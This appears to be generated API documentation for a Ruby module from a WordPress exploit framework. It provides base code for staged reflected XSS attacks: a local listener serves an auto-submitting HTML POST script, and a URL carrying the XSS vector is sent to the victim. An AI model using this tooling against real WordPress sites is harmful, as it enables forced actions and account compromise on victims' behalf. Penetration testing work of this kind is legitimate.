module Wpxf::WordPress::StagedReflectedXss

Provides reusable functionality for reflected XSS modules.

Public Class Methods

new() click to toggle source

Initialize a new instance of {StagedReflectedXss}.

Calls superclass method Wpxf::WordPress::ReflectedXss::new
# File lib/wpxf/wordpress/staged_reflected_xss.rb, line 8
def initialize
  super
  register_option(
    StringOption.new(
      name: 'initial_req_path',
      desc: 'The path to be used to identify the initial request',
      required: true,
      default: Utility::Text.rand_alpha(rand(5..10))
    )
  )
end

Public Instance Methods

create_basic_post_script(url, fields) click to toggle source

Create a basic POST script with the specified fields. All values in the script will be wrapped in double quotes. @param url [String] the vulnerable URL. @param fields [Hash] the fields and values to inject into the script.

# File lib/wpxf/wordpress/staged_reflected_xss.rb, line 52
def create_basic_post_script(url, fields)
  json = ''
  fields.each_with_index do |(k, v), i|
    if i < fields.size - 1
      json += "\"#{k}\": \"#{v}\",\n"
      next
    end

    json += "\"#{k}\": \"#{v}\"\n"
  end

  %|
    <html><head></head><body><script>
      #{js_post}
      post('#{url}', {
        #{json}
      });
    </script></body></html>
  |
end
initial_req_path() click to toggle source

@return [String] the path to use for the initial request.

# File lib/wpxf/wordpress/staged_reflected_xss.rb, line 21
def initial_req_path
  normalized_option_value('initial_req_path')
end
initial_script() click to toggle source

@return [String] the initial script that should be served to automate a form submission to the vulnerable page.

# File lib/wpxf/wordpress/staged_reflected_xss.rb, line 45
def initial_script
  nil
end
on_http_request(path, params, headers) click to toggle source

Invoked when a HTTP request is made to the server. @param path [String] the path requested. @param params [Hash] the query string parameters. @param headers [Hash] the HTTP headers. @return [String] the response body to send to the client.

Calls superclass method
# File lib/wpxf/wordpress/staged_reflected_xss.rb, line 30
def on_http_request(path, params, headers)
  if path.eql? normalize_uri(xss_path, initial_req_path)
    emit_info 'Initial request received...'
    { type: 'text/html', body: initial_script }
  else
    super
  end
end
run() click to toggle source

Run the module. @return [Boolean] true if successful.

Calls superclass method Wpxf::WordPress::ReflectedXss#run
# File lib/wpxf/wordpress/staged_reflected_xss.rb, line 75
def run
  if initial_script.nil?
    raise 'Required method "initial_script" has not been implemented'
  end

  super
end
url_with_xss() click to toggle source

@return [String] the URL to send the user to which contains the XSS vector.

# File lib/wpxf/wordpress/staged_reflected_xss.rb, line 40
def url_with_xss
  normalize_uri(xss_url, initial_req_path)
end